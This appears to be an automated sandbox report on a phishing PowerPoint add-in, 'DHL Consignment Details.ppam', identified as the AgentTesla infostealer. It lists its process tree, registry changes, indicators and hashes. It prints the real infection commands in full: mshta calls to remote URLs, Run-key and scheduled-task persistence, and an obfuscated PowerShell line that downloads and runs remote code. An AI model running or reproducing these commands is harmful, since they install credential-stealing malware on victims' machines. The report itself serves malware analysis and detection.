Analysis
-
max time kernel
142s -
max time network
136s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
21-10-2021 11:22
Static task
static1
Behavioral task
behavioral1
Sample
DHL Consignment Details.ppam
Resource
win10-en-20211014
General
-
Target
DHL Consignment Details.ppam
-
Size
8KB
-
MD5
e49c885d3236afa32adef83e8a201573
-
SHA1
f8e63da458adee3ece85529ddeba477a07087430
-
SHA256
6f931b139cdf0652432a133e3beef1ff6136571c8d953f3eee28316bbf9c5674
-
SHA512
7339c4c43193686e737c6c4dbfcaf7778195e2c51d057436426651c1a62375196f393b69e6abcffa1ca2fc75c4117fb719b5b51b3eb4bd4335c85a8d08f0e3ff
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 928 3576 mshta.exe POWERPNT.EXE -
AgentTesla Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/2520-316-0x000000000043751E-mapping.dmp family_agenttesla behavioral1/memory/664-383-0x000000000043751E-mapping.dmp family_agenttesla behavioral1/memory/664-389-0x00000000056D0000-0x0000000005BCE000-memory.dmp family_agenttesla -
Blocklisted process makes network request 15 IoCs
Processes:
mshta.exepowershell.exeflow pid process 40 928 mshta.exe 41 928 mshta.exe 43 928 mshta.exe 45 928 mshta.exe 47 928 mshta.exe 49 928 mshta.exe 51 928 mshta.exe 53 928 mshta.exe 55 928 mshta.exe 56 928 mshta.exe 58 928 mshta.exe 60 928 mshta.exe 62 928 mshta.exe 63 928 mshta.exe 65 3324 powershell.exe -
Drops file in Drivers directory 2 IoCs
Processes:
jsc.exeRegAsm.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts jsc.exe File opened for modification C:\Windows\system32\drivers\etc\hosts RegAsm.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
RegAsm.exejsc.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe -
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
mshta.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%1230948@gagamutakakachota.blogspot.com/p/12.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%1230948@machearkalonikahdi.blogspot.com/p/12.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_e7293c57732f4f278d939202241e0b25.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_cf83a79c40724f5c8e18bb53de0f0399.txt').GetResponse().GetResponseStream()).ReadToend());" mshta.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%1230948@migimigichuchuchacha.blogspot.com/p/12.html\"" mshta.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exedescription pid process target process PID 3324 set thread context of 2520 3324 powershell.exe jsc.exe PID 3324 set thread context of 664 3324 powershell.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 3508 taskkill.exe 3660 taskkill.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 3576 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
dw20.exepowershell.exejsc.exeRegAsm.exepid process 3052 dw20.exe 3052 dw20.exe 3324 powershell.exe 3324 powershell.exe 3324 powershell.exe 2520 jsc.exe 2520 jsc.exe 664 RegAsm.exe 664 RegAsm.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
RegAsm.exepid process 664 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
taskkill.exetaskkill.exepowershell.exejsc.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 3508 taskkill.exe Token: SeDebugPrivilege 3660 taskkill.exe Token: SeDebugPrivilege 3324 powershell.exe Token: SeDebugPrivilege 2520 jsc.exe Token: SeDebugPrivilege 664 RegAsm.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
POWERPNT.EXEjsc.exeRegAsm.exepid process 3576 POWERPNT.EXE 3576 POWERPNT.EXE 3576 POWERPNT.EXE 2520 jsc.exe 664 RegAsm.exe -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
POWERPNT.EXEmshta.exepowershell.execsc.exedescription pid process target process PID 3576 wrote to memory of 928 3576 POWERPNT.EXE mshta.exe PID 3576 wrote to memory of 928 3576 POWERPNT.EXE mshta.exe PID 928 wrote to memory of 3508 928 mshta.exe taskkill.exe PID 928 wrote to memory of 3508 928 mshta.exe taskkill.exe PID 928 wrote to memory of 3660 928 mshta.exe taskkill.exe PID 928 wrote to memory of 3660 928 mshta.exe taskkill.exe PID 928 wrote to memory of 808 928 mshta.exe schtasks.exe PID 928 wrote to memory of 808 928 mshta.exe schtasks.exe PID 928 wrote to memory of 3324 928 mshta.exe powershell.exe PID 928 wrote to memory of 3324 928 mshta.exe powershell.exe PID 928 wrote to memory of 3052 928 mshta.exe dw20.exe PID 928 wrote to memory of 3052 928 mshta.exe dw20.exe PID 3324 wrote to memory of 2520 3324 powershell.exe jsc.exe PID 3324 wrote to memory of 2520 3324 powershell.exe jsc.exe PID 3324 wrote to memory of 2520 3324 powershell.exe jsc.exe PID 3324 wrote to memory of 2520 3324 powershell.exe jsc.exe PID 3324 wrote to memory of 2520 3324 powershell.exe jsc.exe PID 3324 wrote to memory of 2520 3324 powershell.exe jsc.exe PID 3324 wrote to memory of 2520 3324 powershell.exe jsc.exe PID 3324 wrote to memory of 2520 3324 powershell.exe jsc.exe PID 3324 wrote to memory of 1268 3324 powershell.exe csc.exe PID 3324 wrote to memory of 1268 3324 powershell.exe csc.exe PID 1268 wrote to memory of 4008 1268 csc.exe cvtres.exe PID 1268 wrote to memory of 4008 1268 csc.exe cvtres.exe PID 3324 wrote to memory of 664 3324 powershell.exe RegAsm.exe PID 3324 wrote to memory of 664 3324 powershell.exe RegAsm.exe PID 3324 wrote to memory of 664 3324 powershell.exe RegAsm.exe PID 3324 wrote to memory of 664 3324 powershell.exe RegAsm.exe PID 3324 wrote to memory of 664 3324 powershell.exe RegAsm.exe PID 3324 wrote to memory of 664 3324 powershell.exe RegAsm.exe PID 3324 wrote to memory of 664 3324 powershell.exe RegAsm.exe PID 3324 wrote to memory of 664 3324 powershell.exe RegAsm.exe -
outlook_office_path 1 IoCs
Processes:
jsc.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe -
outlook_win_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\DHL Consignment Details.ppam" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://www.bitly.com/ajdwwdwdwdmlrufhjwijjd2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im winword.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%1230948@kumakahchachi.blogspot.com/p/12.html\""3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_e7293c57732f4f278d939202241e0b25.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_cf83a79c40724f5c8e18bb53de0f0399.txt').GetResponse().GetResponseStream()).ReadToend());3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f0cdxpot\f0cdxpot.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES36BC.tmp" "c:\Users\Admin\AppData\Local\Temp\f0cdxpot\CSC9B77D845C3004C18AFA9F28466A9A068.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_win_path
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 28563⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES36BC.tmpMD5
18e38ab8064ecc2fdf15fb42bbe67bda
SHA10f07e0c4cfefe6063b80cd7c58282aff5ba17897
SHA256e7c514c909b392554ef29746725cbbfa94b8817009bbe2fabddb66a6c9af5920
SHA5120bf9b4b186bfb8b9457e00e3f385bc926feb84438cf8be1ee3762f510b216a59025319ab314a224404cc6f6a46a06b605b8fc7e562514d81c99d16ded2e6c25a
-
C:\Users\Admin\AppData\Local\Temp\f0cdxpot\f0cdxpot.dllMD5
87780e1e819608ad36543ca54f16ad4e
SHA1f6c0556035865fb5a7e3ca3aba9a3a81a0e63156
SHA2565eba40194df77cc79a6911ca0336edff2e10b661131782e7256dd0d708c863a7
SHA512fbcc9c0adaa479586b557cafc9feb59f5374bc420db108d7c0af53bd1d7948e988143960cc74c48eba8bb95fbd0ed567c1f6994887c2becd45c63e9966694247
-
\??\c:\Users\Admin\AppData\Local\Temp\f0cdxpot\CSC9B77D845C3004C18AFA9F28466A9A068.TMPMD5
aeafc7bf342fdde5e80de6a73df16eea
SHA1a259cc402987a1e43bd996b3391fded1cf1ea3e1
SHA2568e8aecd99a9c8ba39fc3c7bb4dafae50cd409bba3652b753560fdef2add011e2
SHA5120100b8cb51a4639ca7e7b8119c9f83ce0c29d668fbaf91a2e4e333e371d9eaa8532c844c586ba8546c3c337d0082cf78cf642d9ffab0cf7c123e5de4f86aad1b
-
\??\c:\Users\Admin\AppData\Local\Temp\f0cdxpot\f0cdxpot.0.csMD5
e03b1e7ba7f1a53a7e10c0fd9049f437
SHA13bb851a42717eeb588eb7deadfcd04c571c15f41
SHA2563ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427
SHA512a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f
-
\??\c:\Users\Admin\AppData\Local\Temp\f0cdxpot\f0cdxpot.cmdlineMD5
9273eb1f3e458e1f069dff3a29aaef15
SHA1019356c02e79df4aa2d16debe6308650232d6a68
SHA2562a5493a8c06d0e140f650ceba9e2490e7d58512d32b67929df7c388122026982
SHA512be54468a5b93286c5f4ce0763b78359b6809dfc5c80432422cf3b7dd53f2b4e74cbc3db63cb257ca3418a071a9e0e0243e307be3cfed6af6c20b6849906fad0a
-
memory/664-383-0x000000000043751E-mapping.dmp
-
memory/664-389-0x00000000056D0000-0x0000000005BCE000-memory.dmpFilesize
5.0MB
-
memory/664-399-0x00000000056D0000-0x0000000005BCE000-memory.dmpFilesize
5.0MB
-
memory/808-292-0x0000000000000000-mapping.dmp
-
memory/928-268-0x0000000000000000-mapping.dmp
-
memory/1268-373-0x0000000000000000-mapping.dmp
-
memory/2520-398-0x00000000056B0000-0x0000000005BAE000-memory.dmpFilesize
5.0MB
-
memory/2520-376-0x00000000056B0000-0x0000000005BAE000-memory.dmpFilesize
5.0MB
-
memory/2520-316-0x000000000043751E-mapping.dmp
-
memory/3052-294-0x0000000000000000-mapping.dmp
-
memory/3324-293-0x0000000000000000-mapping.dmp
-
memory/3324-307-0x0000019328F00000-0x0000019328F02000-memory.dmpFilesize
8KB
-
memory/3324-309-0x0000019328F03000-0x0000019328F05000-memory.dmpFilesize
8KB
-
memory/3324-311-0x0000019328F06000-0x0000019328F08000-memory.dmpFilesize
8KB
-
memory/3508-290-0x0000000000000000-mapping.dmp
-
memory/3576-130-0x00007FF7F8120000-0x00007FF7F8130000-memory.dmpFilesize
64KB
-
memory/3576-257-0x000001722D4E0000-0x000001722D4E4000-memory.dmpFilesize
16KB
-
memory/3576-116-0x00007FF7FB410000-0x00007FF7FB420000-memory.dmpFilesize
64KB
-
memory/3576-129-0x00007FF7F8120000-0x00007FF7F8130000-memory.dmpFilesize
64KB
-
memory/3576-123-0x000001721CDF0000-0x000001721CDF2000-memory.dmpFilesize
8KB
-
memory/3576-122-0x000001721CDF0000-0x000001721CDF2000-memory.dmpFilesize
8KB
-
memory/3576-121-0x000001721CDF0000-0x000001721CDF2000-memory.dmpFilesize
8KB
-
memory/3576-120-0x00007FF7FB410000-0x00007FF7FB420000-memory.dmpFilesize
64KB
-
memory/3576-119-0x00007FF7FB410000-0x00007FF7FB420000-memory.dmpFilesize
64KB
-
memory/3576-118-0x00007FF7FB410000-0x00007FF7FB420000-memory.dmpFilesize
64KB
-
memory/3576-117-0x00007FF7FB410000-0x00007FF7FB420000-memory.dmpFilesize
64KB
-
memory/3660-291-0x0000000000000000-mapping.dmp
-
memory/4008-377-0x0000000000000000-mapping.dmp